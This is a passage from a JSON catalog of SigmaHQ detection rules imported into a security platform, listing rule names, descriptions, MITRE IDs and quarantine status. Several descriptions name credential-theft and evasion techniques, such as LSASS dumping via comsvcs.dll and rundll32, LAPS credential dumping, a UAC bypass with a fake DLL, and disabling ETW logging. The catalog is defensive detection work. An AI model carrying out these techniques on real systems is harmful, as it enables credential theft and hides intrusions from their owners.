"mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-program-location-whitelisted-in-firewall-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" } }, { "id": "sigmahq-sigma-a383dec4-deec-4e6e-913b-ed9249670848", "type": "detection", "name": "Potential Signing Bypass Via Windows Developer Features", "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-signing-bypass-via-windows-developer-features.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a383dec4-deec-4e6e-913b-ed9249670848", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" } }, { "id": "sigmahq-sigma-a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "type": "detection", "name": "Program Executions in Suspicious Folders", "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587", "T1584" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/program-executions-in-suspicious-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml" } }, { "id": 
"sigmahq-sigma-a3ab73f1-bd46-4319-8f06-4b20d0617886", "type": "detection", "name": "Windows Defender Exploit Guard Tamper", "description": "Detects when someone is adding or removing applications or folders from exploit guard \"ProtectedFolders\" or \"AllowedApplications\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exploit-guard-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml" } }, { "id": "sigmahq-sigma-a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "type": "detection", "name": "Data Compressed", "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-compressed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_data_compressed.yml" } }, { "id": "sigmahq-sigma-a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", "type": "detection", "name": "Malicious IP Address Sign-In Failure Rate", "description": "Indicates sign-in from a malicious IP address based on high failure rates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-ip-address-sign-in-failure-rate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" } }, { "id": "sigmahq-sigma-a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "type": "detection", "name": "Potential Suspicious Winget Package Installation", "description": "Detects potential suspicious winget package installation from a suspicious source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-winget-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml" } }, { "id": "sigmahq-sigma-a4694263-59a8-4608-a3a0-6f8d3a51664c", "type": "detection", "name": "Suspicious Key Manager Access", "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-key-manager-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml" } }, { "id": "sigmahq-sigma-a46c93b7-55ed-4d27-a41b-c259456c4746", "type": "detection", "name": "Linux Crypto Mining Pool Connections", "description": "Detects process connections to a Monero crypto mining pool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-crypto-mining-pool-connections.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"a46c93b7-55ed-4d27-a41b-c259456c4746", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" } }, { "id": "sigmahq-sigma-a4824fca-976f-4964-b334-0621379e84c4", "type": "detection", "name": "Potential File Overwrite Via Sysinternals SDelete", "description": "Detects the use of SDelete to erase a file not the free space", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-file-overwrite-via-sysinternals-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4824fca-976f-4964-b334-0621379e84c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml" } }, { "id": "sigmahq-sigma-a49fa4d5-11db-418c-8473-1e014a8dd462", "type": "detection", "name": "Lsass Memory Dump via Comsvcs DLL", "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-memory-dump-via-comsvcs-dll.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a49fa4d5-11db-418c-8473-1e014a8dd462", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" } }, { "id": "sigmahq-sigma-a4b25073-8947-489c-a8dd-93b41c23f26d", "type": "detection", "name": "Windows LAPS Credential Dump From Entra ID", "description": "Detects when an account dumps the LAPS password from Entra ID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-laps-credential-dump-from-entra-id.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4b25073-8947-489c-a8dd-93b41c23f26d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml" } }, { "id": "sigmahq-sigma-a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "type": "detection", "name": "ETW Logging Disabled In .NET Processes - Registry", "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/etw-logging-disabled-in-net-processes-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" } }, { "id": "sigmahq-sigma-a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "type": "detection", "name": "Unusual Child Process of dns.exe", "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-child-process-of-dns-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml" } }, { "id": "sigmahq-sigma-a537cfc3-4297-4789-92b5-345bfd845ad0", "type": "detection", "name": "Service DACL Abuse To Hide Services Via Sc.EXE", "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-dacl-abuse-to-hide-services-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml" } }, { "id": "sigmahq-sigma-a54f842a-3713-4b45-8c84-5f136fdebd3c", "type": "detection", "name": "New PortProxy Registry Entry Added", "description": "Detects the modification of the PortProxy registry key which is used for port forwarding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-portproxy-registry-entry-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" } }, { "id": "sigmahq-sigma-a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "type": "detection", "name": "Exchange PowerShell Cmdlet History 
Deleted", "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exchange-powershell-cmdlet-history-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml" } }, { "id": "sigmahq-sigma-a557ffe6-ac54-43d2-ae69-158027082350", "type": "detection", "name": "Huawei BGP Authentication Failures", "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/huawei-bgp-authentication-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a557ffe6-ac54-43d2-ae69-158027082350", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/network/huawei/bgp/huawei_bgp_auth_failed.yml" } }, { "id": "sigmahq-sigma-a58353df-af43-4753-bad0-cd83ef35eef5", "type": "detection", "name": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-usage-of-active-directory-diagnostic-tool-ntdsutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a58353df-af43-4753-bad0-cd83ef35eef5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml" } }, { "id": "sigmahq-sigma-a5a2d357-1ab8-4675-a967-ef9990a59391", "type": "detection", "name": "LSASS Process Memory Dump Files", "description": "Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-memory-dump-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml" } }, { "id": "sigmahq-sigma-a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" } }, { "id": "sigmahq-sigma-a5a827d9-1bbe-4952-9293-c59d897eb41b", "type": "detection", "name": "Steganography Extract Files with Steghide", "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/steganography-extract-files-with-steghide.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5a827d9-1bbe-4952-9293-c59d897eb41b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_steghide_extract_steganography.yml" } }, { "id": "sigmahq-sigma-a5b40a90-baf5-4bf7-a6f7-373494881d22", "type": "detection", "name": "ETW Logging/Processing Option Disabled On IIS Server", "description": "Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-processing-option-disabled-on-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5b40a90-baf5-4bf7-a6f7-373494881d22", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml" } }, { "id": "sigmahq-sigma-a5b977d6-8a81-4475-91b9-49dbfcd941f7", "type": "detection", "name": "Remove Immutable File Attribute - Auditd", "description": "Detects removing immutable file attribute.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": 
[ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-immutable-file-attribute-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_chattr_immutable_removal.yml" } }, { "id": "sigmahq-sigma-a5c7a43f-6009-4a8c-80c5-32abf1c53ecc", "type": "detection", "name": "Microsoft Office Protected View Disabled", "description": "Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-office-protected-view-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5c7a43f-6009-4a8c-80c5-32abf1c53ecc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml" } }, { "id": "sigmahq-sigma-a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "type": "detection", "name": "UAC Bypass With Fake DLL", "description": "Attempts to load dismcore.dll after dropping it", "version": "1.0.0", "author": "AiSOC", "tags": 
[ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-with-fake-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_uac_bypass_via_dism.yml" } }, { "id": "sigmahq-sigma-a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab", "type": "detection", "name": "AWS EnableRegion Command Monitoring", "description": "Detects the use of the EnableRegion command in AWS CloudTrail logs.\nWhile AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.\nThere may be situations where security monitoring does not cover some new AWS regions.\nMonitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-enableregion-command-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_region_enabled.yml" } }, { "id": "sigmahq-sigma-a607e1fe-74bf-4440-a3ec-b059b9103157", "type": "detection", "name": "AWS SecurityHub Findings Evasion", "description": "Detects the modification of the findings on SecurityHub.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/cloud/aws-securityhub-findings-evasion.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a607e1fe-74bf-4440-a3ec-b059b9103157", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml" } }, { "id": "sigmahq-sigma-a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "type": "detection", "name": "Azure Kubernetes Admission Controller", "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to 
intercept the requests to the API server, record secrets, and other sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1552", "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-admission-controller.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml" } }, { "id": "sigmahq-sigma-a622fcd2-4b5a-436a-b8a2-a4171161833c", "type": "detection", "name": "Granting Of Permissions To An Account", "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/granting-of-permissions-to-an-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a622fcd2-4b5a-436a-b8a2-a4171161833c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
